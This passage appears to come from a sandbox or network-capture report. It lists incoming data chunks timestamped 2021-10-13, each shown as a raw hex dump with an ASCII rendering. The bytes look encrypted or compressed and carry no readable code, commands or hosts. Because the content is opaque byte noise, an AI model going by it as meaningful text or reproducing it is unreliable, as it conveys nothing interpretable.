2021-10-13 19:02:25 UTC	1	IN	Data Raw: 9e 35 66 8e b8 66 4f 06 ce c2 8c dc 67 8f a1 74 15 4d fb db 0e 86 9c 5e 02 5a 59 6a 49 9e 03 84 f6 20 a9 72 53 b1 c7 53 b2 d2 1d e2 12 46 3d df c3 f1 4c 55 bc 92 8b 77 3c f7 70 e0 ac 81 09 2a eb e8 e1 d3 8e f7 6c d7 3f 70 e4 1f 46 a8 e1 08 fd 40 f5 be 27 8a b4 76 9b 0c 05 d2 51 a4 12 4b d0 ce 9a 29 ad 8b f5 30 68 13 4a 07 ad c0 df 20 da 7c 4a c1 37 1d bc 65 35 ac f6 cf 31 99 e1 17 89 53 9e 7e b1 f0 f7 58 6a 2a 26 da 87 8e 25 17 8c 56 60 85 da 81 35 a9 9d 5a 23 a2 43 c0 24 85 45 ec ed 51 60 a5 f7 da 4d c2 7c 7a 60 04 f2 8a b1 07 cf 49 39 a6 fb 16 7a 09 78 93 fe 45 a9 f0 f4 39 dd 13 0e d8 3b 06 23 37 de d0 29 21 34 c5 2d 72 0b 3a 62 b2 a2 64 bd a1 b7 8d c0 64 8d 08 3d 16 63 44 f4 a0 c6 11 7a ae 27 b1 b8 0d 8d c8 71 14 0a 18 6e 01 95 11 d3 2e eb e0 27 dd cb Data Ascii: 5ffOgtM^ZYjI rSSF=LUw<pl?pF@'vQK)0hJ \|J7e51S~Xj&%V`5Z#C$EQ`M\|z`I9zxE9;#7)!4-r:bdd=cDz'qn.'
2021-10-13 19:02:25 UTC	3	IN	Data Raw: 11 af ce 49 0b c8 45 ac f1 08 d7 8e 32 54 e4 19 9a ad 74 14 e1 fa fc 4e 37 f9 3a 67 53 17 1e 4b 3b 7a b9 49 55 b4 15 6b 7a c1 24 55 d0 4f 62 a5 f3 d6 1b de 2a a7 0d 6d ff 2a f4 ba 69 f2 84 f5 de bd d8 42 e5 70 0e 88 78 d9 c7 3f 23 bd 5f 77 bc e7 98 3a 85 4a fe 87 97 16 79 4c a8 44 07 fb 6b 9d e5 36 5d 82 9b e6 4f 4c 25 cb 04 8c a9 5e aa 49 0e a3 13 ac 9e d5 d4 18 a9 0f 78 27 1a 91 82 0d 33 4c 52 ba b5 9a 1b 44 73 0a 3b e4 c2 14 81 83 dd 88 82 28 82 d7 2d 7b f1 e5 79 59 e9 ca 61 22 ea 35 ca e3 89 c5 16 7f 08 c3 8e 68 7c 98 ad a9 32 67 55 46 7f 82 9a de 0a 93 1e 0f 8f 34 5b bb 6b 61 ff 57 d9 63 1d 00 54 a2 b7 ed 1a 7d 27 28 5a f1 bb 9a 45 14 51 e4 8e 1e b9 62 8b 15 b2 8b 34 bb fe 90 10 77 32 6a f9 e1 dd ac f5 65 3b 3a 31 90 8a 11 2a 7c c9 41 09 c5 ef 24 04 Data Ascii: IE2TtN7:gSK;zIUkz$UObmiBpx?#_w:JyLDk6]OL%^Ix'3LRDs;(-{yYa"5h\|2gUF4[kaWcT}'(ZEQb4w2je;:1*\|A$
2021-10-13 19:02:25 UTC	4	IN	Data Raw: 9b 63 97 d4 24 89 70 a2 d2 1d d4 95 c5 74 2b 8c b6 7a f9 bc 27 b0 ba 8b e6 92 ef 77 c5 b8 72 de d9 5f 40 db 7a 86 af 57 46 3e d1 5c 1d bd 4e ba 81 46 b9 14 3e 25 ea 7c 7e 00 91 14 23 96 a0 ad 10 fd 3e 31 3b 4f ec a7 f3 1f 04 c8 86 dd ba b7 79 9b 35 8d d8 84 f0 0a ee 5b b6 42 16 52 53 3f 95 69 b6 55 f5 58 ef f1 e1 a0 d3 ba 2f a7 6d e6 6c 57 38 c7 69 67 32 79 b5 3b d2 04 17 db 4d a2 89 53 b6 08 54 b3 90 32 7c 5e b0 d2 b7 c3 5a a5 a4 dc 1d a8 d3 22 19 4a 74 61 18 08 e9 4a 86 fe d9 fc 60 60 15 27 95 61 41 e5 71 63 6f cd ac 0a ce fc 8c 26 6c 10 43 1e ad f7 85 ed d6 99 a2 6d 97 31 f4 95 ac 04 d7 33 fa 34 e0 5e f1 f9 e1 ca db 02 e9 ce 1c 9f 98 62 1e c4 c4 8f 46 26 4e 8c 0f 32 b9 8b 65 15 47 70 69 61 88 1d 39 39 48 95 c0 51 e9 b5 f1 03 b8 44 7b d2 e7 6a 88 3e 3f Data Ascii: c$pt+z'wr_@zWF>\NF>%\|~#>1;Oy5[BRS?iUX/mlW8ig2y;MST2\|^Z"JtaJ``'aAqco&lCm134^bF&N2eGpia99HQD{j>?
2021-10-13 19:02:25 UTC	8	IN	Data Raw: 4f 3c 27 af e2 bd a8 f6 0b c5 84 36 3c c0 5a 5f 30 69 33 ee 60 4e f1 df b0 50 32 54 9a f0 18 b3 79 a7 d3 b5 7d 2f 98 8c 41 ab 7a 64 5e 2a e6 12 22 b7 dd 3c 85 50 33 32 41 be ae 3a 04 d7 ec 7d 01 a9 3f e8 2a 04 85 d7 41 3d dd b2 92 d6 b9 7f 15 a2 8b 76 7d 1b 2e 3f 5f 5e da f7 f6 0b b9 59 30 a6 02 77 f9 12 29 84 27 66 1d fd 69 d7 f7 80 31 18 6a ce 73 66 eb e8 8d 2e 1b 8f 8b 9c f5 61 18 b5 23 65 c7 6c 98 2d e6 dd 75 61 12 65 95 a3 05 89 2e 15 4a 56 3b eb de d1 83 39 cd 59 dc 15 55 6b 4b 02 2f 12 f0 b5 4e e7 21 a9 74 8a ac d8 be cd 04 7d 34 a6 05 bf 9c 8c a0 40 e9 25 55 7d 30 ea b9 7d 19 26 8f ea 01 cc f7 39 d7 4d 4d 47 81 b6 2e a3 80 ed 8c be a4 64 63 aa 40 8f 82 d4 06 56 63 44 33 0b e2 56 2b 2d 86 33 0f 41 e5 96 e2 5c 36 e3 60 ee fc b9 9c 6a b9 3e df ea 67 Data Ascii: O<'6<Z_0i3`NP2Ty}/Azd^"<P32A:}?A=v}.?_^Y0w)'fi1jsf.a#el-uae.JV;9YUkK/N!t}4@%U}0}&9MMG.dc@VcD3V+-3A\6`j>g
2021-10-13 19:02:25 UTC	14	IN	Data Raw: 8d 03 15 85 85 da db 09 50 dd cf 2b bb fe ac fd 86 4d 41 21 e5 3e 36 16 e5 12 e1 aa f0 6a e9 10 c9 19 d8 18 89 38 47 12 c6 18 e9 03 0b 9a 56 85 88 8f 73 37 d0 6a 77 8e 1d 5a a3 68 77 46 db 94 e0 70 65 a9 cf cc 95 da 7e 2b be 07 22 86 73 99 fd f4 7e c0 f9 2a 95 19 02 8c 75 5c ce 21 63 4a 77 92 46 de 27 67 98 37 46 7a fb f9 14 5a a4 6f 2f c0 a9 c0 05 f6 be 84 64 e8 6e 85 5b 42 95 b0 60 7d 9b c3 46 30 ff 2a 25 57 df 28 ab 60 78 15 47 42 49 9d ba 56 81 20 69 67 f7 c5 c4 82 8c 58 83 06 45 06 2e 9a 48 f4 10 4d d1 e5 19 88 9a 70 ce 85 e5 0f 7a cc db 35 ee 14 64 2d 14 ea 98 d2 40 4b 13 7e f8 0d 72 5a c5 8c da c2 8a e5 78 fa 97 80 43 12 b1 5a 77 b1 03 de 84 70 30 e0 6a f0 e6 21 5b f4 71 ed a4 91 90 12 1c b7 d4 e2 87 56 07 0c e5 cb 07 69 9c 21 fc 01 c1 5c b5 a0 fa Data Ascii: P+MA!>6j8GVs7jwZhwFpe~+"s~u\!cJwF'g7FzZo/dn[B`}F0%W(`xGBIV igXE.HMpz5d-@K~rZxCZwp0j![qVi!\
2021-10-13 19:02:25 UTC	21	IN	Data Raw: bd a3 7d a1 84 47 42 bf 46 5c 75 5d 00 21 cf 43 72 6b 3e ce be b3 b8 84 c4 84 66 a8 80 71 e5 e0 77 da 13 4e 7f 31 6c d2 15 af cc 6c ff 6f cc e4 15 4b a3 ae 07 cc a8 6e 98 96 72 2d f5 55 a9 f1 3a ff b0 41 8e ff ec a5 78 c7 a2 5e 19 59 b9 28 ec 5a c6 5c 43 9f 71 a0 4c 70 b3 40 7e a8 b9 1e aa 3b cd 12 9b 0b 53 9b 14 4d bd a2 5e 86 c5 a0 30 24 32 ca 38 b8 94 36 b5 cb d2 83 a1 a2 00 8e 22 90 db 20 e8 16 bb a1 06 ac 3c 0d 17 f8 68 4e 38 50 b0 e1 c3 34 53 2e 33 ef 6d ae 2e d0 b1 55 d2 65 87 a2 ba 7d 70 cd b6 da 33 3d 57 c4 d7 81 5b 66 25 2f 4a 46 d5 9b 0f a6 a8 56 2a 56 85 82 b0 1b 4b 61 2a 5d 50 c5 4f 38 8e d7 86 d0 8d 74 13 93 69 4e 08 02 f6 91 47 6f 57 8d 87 17 1e 48 c6 53 2c bc 3b ec 7b 92 73 0b f8 e4 29 fc d9 a9 ad fb 4d 3e 42 2d df 07 66 32 b8 c9 38 98 73 Data Ascii: }GBF\u]!Crk>fqwN1lloKnr-U:Ax^Y(Z\CqLp@~;SM^0$286" <hN8P4S.3m.Ue}p3=W[f%/JFVVKa]PO8tiNGoWHS,;{s)M>B-f28s
2021-10-13 19:02:25 UTC	29	IN	Data Raw: c4 49 5a 98 ee 99 f9 c3 cf 1a 11 d9 88 ad 1c c6 9b 3d b0 ff 20 c2 ab ad 0c 84 9f a1 81 e2 34 6e bd 8c 61 f8 26 0b 94 08 17 ae 54 4a 11 6f 1e 0c 6c 44 92 36 7e a3 e4 b2 9b 59 1f e5 49 7d b0 97 44 c9 cd 6a c4 88 5a 01 a2 f6 4a 38 b0 68 dc 67 f3 69 71 85 42 84 10 d6 93 a2 e6 8a e4 33 0b 1a 1c fb 95 ff 85 56 48 43 9d fd 99 77 8d c2 78 e7 b6 87 6e c6 4c 3d 4e 15 95 c8 d0 7c 8b cb 8c 14 46 4b 5d 27 c5 0e a4 de c5 3d f1 46 64 e2 ff 46 d7 d3 f6 f5 3f d1 6d db af 83 aa e2 32 fe 9a f1 57 46 3a 28 2e 7c cb 53 27 e4 2f 7a a7 97 9a 91 5e 78 31 83 b9 28 f3 82 8e d1 6c 42 b7 69 61 e0 e8 e5 49 16 48 23 73 72 0c 95 04 a9 c6 e9 07 43 db 97 1a 1b 13 19 93 c6 04 21 53 9e 4b 0f b9 07 a0 8e a5 25 dd 30 f1 ea 18 a6 cd 94 82 0a 26 86 61 72 4b bf af f5 7f 3f 69 f1 0a b6 a7 1a 2e Data Ascii: IZ= 4na&TJolD6~YI}DjZJ8hgiqB3VHCwxnL=N\|FK]'=FdF?m2WF:(.\|S'/z^x1(lBiaIH#srC!SK%0&arK?i.
2021-10-13 19:02:25 UTC	38	IN	Data Raw: 52 85 b0 cc 94 a7 fd d7 5f 70 63 9c 23 77 0b bb 26 40 00 7a d3 a6 fb c3 88 27 7e fb 87 47 82 80 bb 53 06 0c 3e 7d 48 91 22 a5 bf a7 f6 63 06 c2 fb 82 d8 50 8d 9d 65 7c 22 f5 d5 04 0c c0 92 e5 df 5a 41 81 0f 32 a7 44 c6 ef 03 ee 19 df e5 f9 52 67 2f 98 15 eb ad bf 49 29 5f 27 58 5b 3a f4 73 5a 23 13 7a 11 49 ab 1c fa 63 8b 8d e9 97 dc 24 08 0a df c0 9f 41 10 b1 48 60 b2 75 a9 66 95 63 99 d6 07 8e 50 79 6c 40 7d 72 75 65 8a ab 43 f2 f3 b3 34 41 b4 43 40 bd 24 3b 89 68 49 0f 3c 7c 18 f1 43 43 ea 43 d2 d5 cf 22 33 aa 2e a0 80 f5 ce ab e8 f0 a7 be 33 91 e3 63 e4 6f 41 57 6e 03 0f b0 f9 47 78 79 c9 91 5d 0b 5d 33 3b e2 8a 97 7b 89 ba 8e 32 f8 f9 c5 c7 16 75 c8 6e cc c3 53 17 56 59 ac 96 21 4f 41 86 e0 11 62 12 69 65 81 39 44 c1 41 52 86 91 36 c6 e0 ba 41 22 4f Data Ascii: R_pc#w&@z'~GS>}H"cPe\|"ZA2DRg/I)_'X[:sZ#zIc$AH`ufcPyl@}rueC4AC@$;hI<\|CCC"3.3coAWnGxy]]3;{2unSVY!OAbie9DAR6A"O
2021-10-13 19:02:25 UTC	49	IN	Data Raw: 37 6a 8e 33 05 5f 17 fb 59 d9 ae d2 79 e7 6b 0d f8 ef 5d f8 1a 49 9a ab d1 87 a7 de d1 ae 7f 55 94 e7 1c eb d4 0b ae 94 54 bc e0 6b 4d f9 4b a3 a3 1f 34 a8 0f 0d 3d 5d 8d 61 15 1a f7 98 21 c8 90 ef 3a 94 0b a8 da 81 f7 23 bd 27 2a 08 62 58 38 12 ab a7 92 c2 99 6b 6d ba c0 ba 9a 02 01 b0 3a 88 53 01 8c 88 e7 be d3 d7 ca 5b 9b 0b f0 8a d6 14 41 12 85 b4 89 1c fd d1 02 f7 be bd 4b a9 cf 83 59 85 ec b1 77 09 e5 75 d2 5e 52 b0 a0 75 d8 06 40 e1 6d de 59 11 92 94 6c 66 17 57 8e ee 45 51 7a fd 15 b7 05 76 0c 59 1b fc 0e 2e 90 cb df 74 b9 b1 74 e7 08 42 b2 82 25 f2 a9 e4 5d 4b 2f e4 88 a9 f8 e2 ee 5f 51 73 2a 7d 5e 33 a9 53 1b 2a 84 d1 b1 47 1e 30 d4 f5 c9 d3 51 8e 23 24 c9 f6 7a db d6 ff e1 4e 5e 86 b3 31 86 25 91 ba 5d 13 f3 ad 1c 80 8f 58 61 68 a3 9d b9 0d 41 Data Ascii: 7j3_Yyk]IUTkMK4=]a!:#'bX8km:S[AKYwu^Ru@mYlfWEQzvY.ttB%]K/_Qs}^3S*G0Q#$zN^1%]XahA
2021-10-13 19:02:25 UTC	53	IN	Data Raw: b7 8a 25 14 86 aa 6c 60 f4 3f 27 3b 37 af e1 0a e7 83 b6 12 c2 ba 29 41 1b b3 56 f0 97 cf 9c fa ea d9 d1 9d 9f cb 2f 96 22 44 a6 bf 0e d0 c2 98 83 1f 08 5d b2 b5 21 8c 17 8f 93 27 76 a1 f2 3f 9f f5 19 51 b1 ae 08 0a ec f9 5a 89 e2 74 75 21 30 b9 95 f5 e4 c6 09 98 a2 72 38 8f e0 56 67 15 9b 7f 46 8b b0 50 6c e9 b0 da 41 d1 28 66 87 3a 7e 0b 38 83 3f b9 31 76 0e 76 4f 57 51 53 ac bc 5b 81 c6 ea fd 66 f5 0c 79 90 43 95 27 68 18 1d 33 4c a3 4f e7 a5 6b ca aa d1 b2 e7 7f 27 5c d2 da b1 22 47 fe ce 5e a0 f2 e0 65 7b 56 28 4d 88 ec d2 97 6e 09 86 e5 ea 2d a6 18 4f e0 3e 2e 93 da 97 30 be 39 89 f8 f7 63 d0 58 82 38 28 ae a4 90 5d ae b5 85 29 9d b2 ff 53 b0 4e 39 4a 5e db a1 c2 29 a2 10 4e 0f e4 5c 90 18 d5 c9 c9 c2 f0 f8 81 96 c5 12 31 a9 8d 18 6c 98 6f 3b a7 2c Data Ascii: %l`?';7)AV/"D]!'v?QZtu!0r8VgFPlA(f:~8?1vvOWQS[fyC'h3LOk'\"G^e{V(Mn-O>.09cX8(])SN9J^)N\1lo;,
2021-10-13 19:02:25 UTC	64	IN	Data Raw: 19 df 7e 68 1a 83 f8 a8 a9 ab 3e d4 66 60 05 3f ae 65 79 8f 16 0e de 92 23 68 f0 e9 a2 27 c5 ee 3d 12 a8 be 32 ac a3 fb 98 a0 09 8b 27 46 15 d1 3f 6b a3 5e f7 7e a6 85 ac 40 e8 07 16 85 24 d5 1d 8d b4 98 62 03 5f 32 c2 6e 80 16 87 b1 2b cb a9 a7 4e 1f b4 64 e2 aa 95 4f 0c 59 5c 6d b0 a2 7a 7f d7 bb ce 12 a4 0a fb 83 3d 0e ca 37 bb 83 4c c5 2a 92 26 fd 2c 18 66 da ac 0e 61 03 46 90 59 60 51 06 2d 28 d0 93 e0 51 1d 60 cd 1d 8e 67 09 37 4d 12 17 82 5b c6 f2 31 20 9e 5d b8 13 31 c6 8f 5d fe 1f 5c 15 69 08 d7 8e 3f 5c e6 4d 01 b6 6e 8c 53 83 ab cb 8f 8b 6f 40 cb 53 2a 85 f5 2a b7 2d 0d 46 26 a5 3f 87 b4 a1 fc 50 69 a3 8a b2 ed 11 b1 f5 ca 91 e8 7e 0d 76 5e d9 59 91 32 f0 b0 ef 57 88 39 5b 29 c8 1f 7b a9 09 14 63 c4 cf 0f 24 5a b0 dc d4 81 e0 61 9b c5 82 b5 e3 Data Ascii: ~h>f`?ey#h'=2'F?k^~@$b_2n+NdOY\mz=7L&,faFY`Q-(Q`g7M[1 ]1]\i?\MnSo@S*-F&?Pi~v^Y2W9[){c$Za
2021-10-13 19:02:25 UTC	78	IN	Data Raw: 77 77 9c 04 89 5e df ce fa b3 ba 5c 1d fb c6 a3 fa 44 26 89 fd 14 e8 7c 14 6b 13 f0 81 9f a3 ef d9 07 df 9c e8 8b 47 ab 3f 7e cf d6 58 b0 ff c2 2b 27 45 ce 03 42 b2 d6 84 c4 90 3a 6d 3e ef 72 32 af 0c 5c c6 86 b9 a9 21 9f 91 f7 57 09 58 b2 c1 2d 35 12 3c 9f 64 36 b4 00 50 13 35 64 56 1e e2 9e 22 83 9e 70 f8 ed 0e 47 40 6b e6 51 76 26 4f 1e 49 15 c2 dc f9 eb 38 57 81 d4 10 f1 bb e2 b1 07 c3 d8 2d cf 0c 39 69 d3 bc 07 64 63 e0 59 6b f4 08 53 dc d0 22 65 6d 4f fd 15 48 fd f5 f1 bd 3b 10 fa a2 34 3d 19 a8 fe f5 67 1e ed 92 51 19 cb ae 60 f0 8b 10 c3 e5 3f b2 68 e9 33 59 e9 e9 98 8c bf 8a 7a 8b 40 c1 63 39 58 4f 64 e3 a2 7d 73 0c 0b 1e 7e 69 16 96 3c 3a c4 ae e4 e4 92 ca 0a f1 09 ba 7b f3 f9 af 8c c3 7b 6a d4 83 c2 2c 88 6f c7 ee 5a ff 45 a6 c3 cd 2f 33 4e 82 Data Ascii: ww^\D&\|kG?~X+'EB:m>r2\!WX-5<d6P5dV"pG@kQv&OI8W-9idcYkS"emOH;4=gQ`?h3Yz@c9XOd}s~i<:{{j,oZE/3N
2021-10-13 19:02:25 UTC	93	IN	Data Raw: 80 dd 9b 30 bb d1 2a dc 73 64 c5 87 9b ec 65 df 8e 04 2f 2f c6 b5 9b 24 d7 2f d8 28 f7 41 07 4e a7 30 a5 62 9f 2a 8a 59 69 6c 69 38 ee 1a a7 e0 48 7d 74 e7 85 21 ed a3 8a f7 fc b5 9d ac 47 21 bf 89 46 6b 34 6f f3 30 3c 0b 4d bd 6b 12 21 38 cc 88 7f 86 15 72 29 78 22 5b 33 32 ad 4d 40 da e9 c8 e5 e2 56 13 72 1a e0 b1 f2 53 33 f0 bc 25 05 e9 b1 e0 6b 3e 9d 3e 0a b9 56 fe 0e ec f9 2c ad cf 6b 6a ae 92 53 93 cc 57 02 ca 5f e2 32 4f 05 82 94 47 d8 92 7a c0 c0 03 9f cb 22 dd d9 bb b8 13 f9 f4 47 dd 5e 77 fb fe e0 06 ff 36 27 e6 18 44 e9 6f 27 16 ea a3 69 09 74 c6 91 29 d0 04 86 48 ac ba 45 64 50 83 1b 72 94 36 1c 5b 7a 5b 9d 8b 34 1f 0f d8 a0 2f 16 04 62 f4 59 f2 99 69 84 07 80 d9 41 ec d8 94 ff f6 11 8f 7e b8 15 ff 3a 1e 0c 88 03 93 58 3f 33 45 cb 6b d4 e4 40 Data Ascii: 0sde//$/(AN0bYili8H}t!G!Fk4o0<Mk!8r)x"[32M@VrS3%k>>V,kjSW_2OGz"G^w6'Do'it)HEdPr6[z[4/bYiA~:X?3Ek@
2021-10-13 19:02:25 UTC	96	IN	Data Raw: 80 7a 87 3d 05 3e 1d 89 4a 83 6a 8f ca 07 6e ba 48 77 90 e5 d3 44 88 c2 70 31 d1 f0 26 b7 cb ee e4 24 2c f1 60 77 78 35 05 e4 4e 65 37 cc c6 28 23 45 fc 94 26 b7 0b 75 79 0e cf f6 0f d7 cf 33 6d 51 6d 55 61 00 2f b4 95 5a 93 7d f4 86 d8 9e cd be b2 4c ec a2 b4 b8 eb 35 d1 dc 22 36 3b 35 0f 4a 0a 3e bf bd d2 37 a8 c4 eb bf ce 01 d0 9e 2b f4 4d c7 b9 f3 53 fd 4b 83 04 66 16 90 9f 5f 5f 45 b3 8e 56 31 b1 88 da ff 2a 56 c7 e7 ab 20 c2 0c 37 47 8b 39 f0 96 e6 e6 8c d9 ad 6b 81 1b 24 31 4a 81 2a 97 63 0c e9 b9 5d 69 6e d2 dd 79 98 da 73 1d c5 28 f6 60 ec 03 80 57 7e a1 30 a8 94 33 0b 48 07 3e 52 10 ca 20 8c 7e eb e8 42 5d 2c 04 d6 d1 f4 72 bf 0a 83 79 4e f9 c8 8e 14 eb 57 56 46 d6 22 0c 9e 25 72 8c f8 f7 13 f5 20 d3 ad 55 91 36 8a 89 9a 97 0c cb a6 dd ff ef 2c Data Ascii: z=>JjnHwDp1&$,`wx5Ne7(#E&uy3mQmUa/Z}L5"6;5J>7+MSKf__EV1V 7G9k$1Jc]inys(`W~03H>R ~B],ryNWVF"%r U6,
2021-10-13 19:02:25 UTC	112	IN	Data Raw: 0b 9f 0f d7 d2 bd 1d 59 12 58 75 95 09 04 7a 63 6f 7a b1 1a 7b a4 a4 62 4a 36 37 23 ab c6 cf 8c 5d 6f a9 7f 67 03 a9 a1 a2 42 54 60 00 c6 55 72 03 3b 81 e8 82 25 19 2b 52 74 61 55 09 4b 00 20 00 3c 9a d0 91 df 47 0c ee 68 a3 00 06 8d 9d d8 23 66 be 4e 75 6f 2b 5a 98 5d 85 3f 5f 73 52 e4 b3 91 b1 27 8b 65 73 dd 74 8a e7 c1 f2 89 85 f1 71 89 ef d1 d8 dc ca 18 64 89 60 0d 24 ea 6d db 31 26 3d 91 0f e6 0e a7 8d b9 46 69 fc f6 8a b3 9d 82 73 a3 c5 d3 49 97 ba 1f 3d 09 f5 5e c7 69 70 40 82 da 33 2c ca 0b 7a 21 73 91 1e 42 72 b8 39 09 9a 49 d4 0c 4f ec 72 70 c0 92 c0 33 6a 29 02 1e 85 4b 7d 20 4e ea 39 2e ee dc 81 27 0e 75 f8 80 97 cd dc 08 05 a7 07 88 ad f5 de b0 86 59 06 07 44 e5 10 18 97 0e 84 75 fc 7b 19 65 b2 a3 0f d6 0b 3d b9 4d 00 07 40 40 74 b9 bb ea 68 Data Ascii: YXuzcoz{bJ67#]ogBT`Ur;%+RtaUK <Gh#fNuo+Z]?_sR'estqd`$m1&=FisI=^ip@3,z!sBr9IOrp3j)K} N9.'uYDu{e=M@@th
2021-10-13 19:02:25 UTC	128	IN	Data Raw: 42 12 88 8e e5 84 bb 35 b4 d5 93 81 20 a1 11 17 6d d1 e5 1e 59 6b 08 69 9b e3 9b 38 cd c8 fd ef 47 1b 4b a1 35 2e 22 75 cf b3 35 06 ba e1 df 67 2e de 28 50 16 13 93 41 43 31 62 1d 54 05 75 c3 be c3 50 1f b7 8e a7 fe 25 81 ab 0e 7b 71 99 3e cc f0 07 a2 1d 85 81 4e 50 46 41 cf ce 39 fd ed 99 55 fd 95 d4 a4 72 ba 23 33 88 d0 22 df c2 e7 c5 ef da 67 16 4a 09 80 e1 61 38 cf 8e cc 53 4d 79 50 9c d5 99 72 81 5a 38 98 0e 63 2d d4 56 40 ba 58 f2 cf d1 d2 c8 ac cf de 5f de 17 ef ed 91 1f 82 ce bf cb c3 55 49 c9 fe be 4a 57 6c b2 b0 90 88 4f 42 3c c1 36 6d 8e d5 dd c0 8c f4 13 ea 8a a9 aa 0b 73 53 ee 69 c9 68 2c 55 46 ae c4 f5 d1 3d 71 10 79 8b f0 d3 e0 b7 ae e9 cf e7 50 4d 2d de 44 30 0d d1 fa f0 52 83 de 22 01 d0 b8 dd 6e 49 5f 3b 83 80 3c c1 17 57 ad c8 b5 9f fd Data Ascii: B5 mYki8GK5."u5g.(PAC1bTuP%{q>NPFA9Ur#3"gJa8SMyPrZ8c-V@X_UIJWlOB<6msSih,UF=qyPM-D0R"nI_;<W
2021-10-13 19:02:25 UTC	144	IN	Data Raw: e3 6e cc f6 b0 75 89 11 73 24 09 b7 c4 c1 6f 2a 67 47 ed c1 16 ea ee ab 36 34 f8 80 1a f3 6e 3a ac 8d 7f 78 dc c5 21 a2 34 20 d3 0d 34 93 de 19 71 af 07 83 e7 33 a5 3a 1d 08 71 2a a3 58 3b 83 99 b0 e8 5e 07 c4 77 19 50 7e b5 06 aa 0e bb 21 bb e6 47 24 2a 46 0d b7 53 37 8c ad f2 c3 86 70 b4 b6 ce 08 56 5c ad ff 0c 2e 70 d1 1f 78 ca ce 16 f1 2b 5d b3 33 8d 5e 09 fa b4 db 84 8a fe d1 c5 c8 d6 23 ec b1 ba dd 19 79 74 5c 33 ed 75 fb 81 d0 79 85 05 b2 55 2e 77 7a b3 2c a5 76 b2 aa 5d 3f 5f 2e 9c 76 eb 0c 6d a4 e2 e4 18 e1 56 33 a3 0b 16 cf 34 a9 28 9a 78 e9 e7 a4 c0 6c 19 5a 96 fe fb 37 a3 97 29 59 aa 5b 5b a9 83 de 88 c3 74 e7 d3 55 64 65 d4 63 12 dd 8b 2a 68 30 7f a2 f5 05 e1 94 e9 2e ef 30 92 e9 2e 6d 28 6c 25 9a 66 35 14 2b 97 cf d0 f8 b2 aa 82 b5 62 75 68 Data Ascii: nus$ogG64n:x!4 4q3:qX;^wP~!G$FS7pV\.px+]3^#yt\3uyU.wz,v]?_.vmV34(xlZ7)Y[[tUdech0.0.m(l%f5+buh
2021-10-13 19:02:25 UTC	160	IN	Data Raw: 0d 67 67 bc 0d 82 a2 31 e3 4d d4 00 7f be 3a fd 7b 3b 8f d0 cf a7 b3 97 a2 cd 96 3a 88 56 f7 19 0b 4d 7c 36 20 c8 6b 86 22 20 83 b1 6e 54 22 2e 92 a3 fc bf 13 1c ab 9c 02 c2 f1 fc 76 f6 90 08 a6 15 a2 08 4d 74 59 b7 cd bb f9 24 e3 b3 12 2f ba 86 6b 8f d4 6a 69 5c c3 01 54 db 14 cc ae a8 d5 06 45 69 0f e9 03 64 b5 59 4f 16 7b 8a 70 16 61 24 27 e3 5e a7 4c 44 18 52 be f4 f9 bb 06 b6 fb 59 8b dd ee 8d c4 8b 10 7c 0c 0f b4 fb d8 2b 81 b0 7b 8c 12 6d f6 c8 7b 5d 01 cf 5b da 16 ee 68 0e d9 97 9d e5 77 e0 f6 63 a7 a9 e0 93 47 7b eb ef e3 2f 0e 1f d1 51 8c 69 8c 20 64 74 b8 f3 74 65 27 d2 7e 67 45 f2 36 c9 f7 a7 f7 49 2d f3 8e 9f 8c 23 6a 34 45 79 42 4c d4 f5 1d f0 7c 7b b9 a9 c6 e2 5c 3d cc bc 70 4b 0d f4 ef 36 9a 1e 1b 94 ba fb ff c3 22 bd 5f 1a 0a 44 c4 3e 65 Data Ascii: gg1M:{;:VM\|6 k" nT".vMtY$/kji\TEidYO{pa$'^LDRY\|+{m{][hwcG{/Qi dtte'~gE6I-#j4EyBL\|{\=pK6"_D>e
2021-10-13 19:02:25 UTC	176	IN	Data Raw: b7 79 24 67 11 8d 1d b2 43 12 11 3d da 58 52 a5 3a 29 5f 60 32 7c 41 4c 06 48 c2 b0 85 c8 bd 1d 89 3e 78 26 c4 a2 44 69 89 1d 4c cb 63 84 18 fd 11 73 3f 3c 81 47 13 4c 1f 48 d8 27 88 74 89 33 8a e7 b0 08 26 3d 67 73 73 1e b6 cd c5 39 9d 84 18 17 c7 4a 53 a5 f9 7a 5a a9 1d 0d e0 9b 0b 35 ec b7 b3 0a 7a 40 09 48 2f 6b 86 e9 be 8f 77 20 46 cc 1d bc 5d a0 af 01 6a 52 90 b6 04 47 06 e9 b3 26 52 2d f5 5c fb 24 a8 d5 1c 06 11 ad 0e 66 bd 6c 3d b8 b5 61 fb c7 7e 72 a2 03 cc f4 20 a1 06 3e d0 57 a6 7a 76 04 51 37 41 d9 8b ac 24 31 13 c8 d3 bc e8 a3 7a 29 d5 b1 75 de 49 ab 71 df 5c f8 5d ed 4a 7c ed f0 86 de 92 d8 b8 ff 38 48 25 a4 d1 ad e9 58 97 73 61 99 39 86 59 0a 46 2e 56 c5 d7 9c e2 fb 94 94 8b 76 9d 78 d9 a6 7b 6c 79 95 07 f4 7e 6e 27 ba 40 98 6c d0 07 73 00 Data Ascii: y$gC=XR:)_`2\|ALH>x&DiLcs?<GLH't3&=gss9JSzZ5z@H/kw F]jRG&R-\$fl=a~r >WzvQ7A$1z)uIq\]J\|8H%Xsa9YF.Vvx{ly~n'@ls
2021-10-13 19:02:25 UTC	192	IN	Data Raw: 6a 9b 12 fa 3e dc b9 0d 0f 69 5a 54 89 25 71 23 ec a2 12 74 bd 09 a0 7d 60 40 24 dc 9d 3b ea 67 5c 48 7d 3d ef 18 7c 2f ef 8d 88 98 b0 a0 b9 66 70 c5 e0 15 70 00 fd 47 38 26 c9 5e f9 db 1e a4 e9 e2 dd 69 cc 22 3e 25 40 77 b3 b8 de e3 a7 ca 7f 96 a4 e4 f7 e5 00 26 d9 2d 2e 20 2e 4e 81 ed 75 50 98 6e 89 b9 77 cf cb 3a ed e7 6a 91 5e 51 a9 4c fa 16 66 90 cc cb 8e 8a d1 68 69 1d 15 da 49 54 d0 ce 4f 48 b1 31 62 1f 2f 1a 0f d3 94 2b 9b 45 93 2a 4e 09 eb b2 dd 03 c8 be 76 ee f0 0a 94 29 91 75 93 bb b7 00 b1 75 9e 15 e8 19 6b 19 2d fa 68 fa 9b f1 91 ce 1e b4 e9 7a 29 b3 bb 22 b1 f6 a3 fb 93 d5 e4 24 e6 3b f2 8b ff 08 79 01 e2 73 df f3 00 fc 6c da 69 3d 3c a1 21 11 eb e7 9c c4 55 dd 75 09 ac c6 f2 e2 7d 0b 54 ff 5e 01 ae cd 42 2d 1f c0 8d ea 0f 3c f6 84 71 54 51 Data Ascii: 